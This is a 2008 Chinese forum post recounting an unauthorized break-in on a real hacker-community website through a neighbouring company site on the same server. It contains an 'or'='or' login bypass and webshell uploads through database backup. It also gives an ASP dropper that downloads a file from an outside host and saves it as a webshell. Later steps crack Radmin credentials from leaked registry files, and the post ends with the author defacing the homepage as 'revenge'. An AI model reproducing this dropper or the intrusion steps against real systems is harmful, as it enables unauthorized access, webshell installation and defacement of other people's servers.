渗透冰兰黑客基地

晓莲当 發表於 2008-10-8 19:38:30

注：本人已经提交到C.R.S.T ,适合新人学习..

首先是有个朋友对我说有个冰兰黑客基地，转载别人的文章还不著名作者，之后还蒙骗别人说他们能入侵国外站点. 所以就想检测一下. 

首先看了以下他的站点，主站和论坛.分别在不同的服务器. 

主站是新云的，虽然爆出很多漏洞，但是毕竟人家也是玩黑的，所以不期望能从程序漏洞拿了.. 

论坛是php的.没仔细看，决定渗透了. 

一：点兵 

拿出旁注 

地址：http://www.icehack.cn 

IP：XX.X.XX.X（忘记了...） 

挖靠，N多站点.... 

最后选择了一个公司的站点，有注射点，但是不显示错误，手工猜解是asc数据库 ... 

拿出HDSI扫后台，扫到后台地址为http://www.XXXXX.com/Product/manage/Manage.asp 

到这里的时候直接用'or'='or' 试了下. 进去了.. 

有数据库备份和恢复. 直接传jpg的木马（大马）.传不上去，可能限制了大小. 

之后换小马，红狼1K大的小马，传好后备份.成功.

二：士气 

小马传好了，各位一定认为直接传大马，之后就是提权的事了吧.可惜好事多磨... 

传好小马之后我直接传个大马上传，但是如图1

 

提示错误：很抱歉，由于您提交的内容中或访问的内容中含有系统不允许的关键词，本次操作无效，系统已记录您的IP及您提交的所有数据。请注意，不要提交任何违反国家规定的内容！本次拦截的相关信息为：98424b88afb8

我以为换个大马就可以了，之后换了N个，国内的，国外的都试了.我想可能是禁止提交了，但是我提交几个字都可以提交上去，到这里，我快放弃了。 

但是忽然想到一哥们（烟，灭在雪里）的方法.具体如下： 

提交代码 

<% 

Set xPost = CreateObject("Microsoft.XMLHTTP") 

xPost.Open "GET","http://www.hackerchina.cn/1.txt",False 

xPost.Send() 

Set sGet = CreateObject("ADODB.Stream") 

sGet.Mode = 3 

sGet.Type = 1 

sGet.Open() 

sGet.Write(xPost.responseBody) 

sGet.SaveToFile Server.MapPath("1.asp"),2 

set sGet = nothing 

set sPOST = nothing 

%> 

利用服务器的XML和数据流组件，从我的blog的1.txt的内容下载到目标站点根目录并保存为1.asp. 

我提交这段代码，保存为3.asp ，之后访问，显示空白. 

之后访问1.asp.如图

 

，成功了.. 

三出征 

已经拿到了一个webshell，就剩下提权了，但是提权一般难度要比webshell还难.如何呢？ 

WEB服务器版本Microsoft-IIS/6.0 

Scripting.FileSystemObject √ 文件操作组件 

wscript.shell × 命令行执行组件 

ADOX.Catalog √ ACCESS建库组件 

JRO.JetEngine √ ACCESS压缩组件 

Scripting.Dictionary √ 数据流上传辅助组件 

Adodb.connection √ 数据库连接组件 

Adodb.Stream √ 数据流上传组件 

SoftArtisans.FileUp × SA-FileUp 文件上传组件 

LyfUpload.UploadFile × 刘云峰文件上传组件 

Persits.Upload.1 √ ASPUpload 文件上传组件 

JMail.SmtpMail √ JMail 邮件收发组件 

CDONTS.NewMail × 虚拟SMTP发信组件 

SmtpMail.SmtpMail.1 × SmtpMail发信组件 

wscript.shell × 命令行执行组件被删除. 

装了servU6.3 但是找不路径，没有权限访问.不可跨目录， 

只有C:\Program Files C:\Documents and Settings可访问，装了麦咖啡， 

（感谢伤心的鱼）一兄弟告诉我本地溢出，baidu了下都是控件的，感觉麻烦.. 

继续找别的突破口，忽然看到有radmin 目录，哈哈，高兴，看来装了radmin. 

扫描了下端口，竟然没开43958.算了，读取下注册表读取不了.但是radmin的目录下有3个注册表文件，下载回来研究。 

四得胜 

Windows Registry Editor Version 5.00 

 

 

 

 

 

"1"=hex:24,00,00,00,00,00,00,00,1f,00,00,00,01,05,00,00,00,00,00,05,15,00,00,\ 

00,99,c8,3d,4a,e9,e2,9b,3a,e1,64,8a,f8,f1,03,00,00,24,00,00,00,00,00,00,00,\ 

1f,00,00,00,01,05,00,00,00,00,00,05,15,00,00,00,99,c8,3d,4a,e9,e2,9b,3a,e1,\ 

64,8a,f8,ec,03,00,00,24,00,00,00,00,00,00,00,1f,00,00,00,01,05,00,00,00,00,\ 

00,05,15,00,00,00,99,c8,3d,4a,e9,e2,9b,3a,e1,64,8a,f8,f4,01,00,00 

 

"NTAuthEnabled"=hex:00,00,00,00 

"Port"=hex:fe,ff,00,00 

"Timeout"=hex:0a,00,00,00 

"EnableLogFile"=hex:01,00,00,00 

"LogFilePath"="c:\\logfile.txt" 

"FilterIp"=hex:00,00,00,00 

"DisableTrayIcon"=hex:00,00,00,00 

"AutoAllow"=hex:00,00,00,00 

"AskUser"=hex:00,00,00,00 

"EnableEventLog"=hex:01,00,00,00 

"Parameter"=hex:b3,8f,17,d7,f9,4e,cb,96,11,26,42,bf,29,cd,a6,86 

Windows Registry Editor Version 5.00 

 

 

 

"showbw"=hex:01,00,00,00 

"ViewType"=hex:00,00,00,00 

"ConnectionMode"=hex:49,9c,00,00 

"xsize"=hex:77,01,00,00 

"ysize"=hex:47,01,00,00 

Windows Registry Editor Version 5.00 

 

 

 

"Data"=hex:35,e3,db,da,7c,ef,32,ad,2c,a5,b8,1a,4b,e2,b2,47,7b,1d,eb,05,4c,36,\ 

0e,65,8a,ff,ec,aa,7d,63,a1,47,50,db,f2,0a,c5,a7,1d,dd,08,6b,7f,02,90,2b,b8,\ 

6c,da,7a,96,cb,dc,c9,e2,1a,8c,4d,25,39,57,f8,ee,83 

以上是注册表文件的内容， 

提权的步骤感谢 fhod 支持. 

3个注册表在本地运行之后，然后本地打开radmin设置，发现端口为65534 

但是密码是32位MD5，麻烦.怎么破呢.. 

用星号密码查看器查看为 reityewi 

，连接.....................连接不上...郁闷了.. 

后来才知道星号密码查看器看到的都是这个reityewi.... 

后来，baidu了下.找到一篇文章是直接破解radmin控制端. 

地址：http://www.hackerchina.cn/index/blog/post/123.html 

之后连接radmin....ok.连接上了.. 

五收兵 

直接找到iis.

 

中间还有个小插曲... 

管理员登陆了3389.这里再次感谢fhod，（和管理员比速度）... 

打开iis，找到冰兰的站点，之后传了大马上去.如图.

 

呵呵之后修改了首页，但是并没有对数据进行删除，算是带点报复的友情检测

再次感谢伤心的鱼 fhod 烟，灭在雪里提供技术支持.

頁: [1]

琼殿技术论坛's Archiver

渗透冰兰黑客基地